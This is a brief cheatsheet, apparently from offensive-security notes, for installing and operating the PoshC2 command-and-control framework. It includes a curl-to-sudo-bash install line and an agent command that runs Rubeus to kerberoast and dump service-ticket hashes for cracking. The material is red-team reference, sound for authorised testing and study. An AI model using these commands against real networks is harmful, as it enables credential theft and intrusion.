PoshC2
Install
$ curl -sSL https://github.com/nettitude/PoshC2/raw/dev/Install.sh | sudo bash -s -- -p /opt/PoshC2 -b devRun
List projects:
$ posh-project -lShow current project:
$ posh-project -cCreate a new project:
$ posh-project -n <PROJECT_NAME>Adjust config:
$ posh-configStart team server:
$ posh-serverConnect to the team server:
$ posh -u snovvcrashCheatsheet
Load .NET assembly and run it (available for agents that load CLR):
C# 01> loadmodule /tmp/Rubeus.exe
C# 01> run-exe Namespace.Class Assembly <args>
C# 01> run-exe Rubeus.Program Rubeus kerberoast /usetgtdeleg /format:hashcatLast updated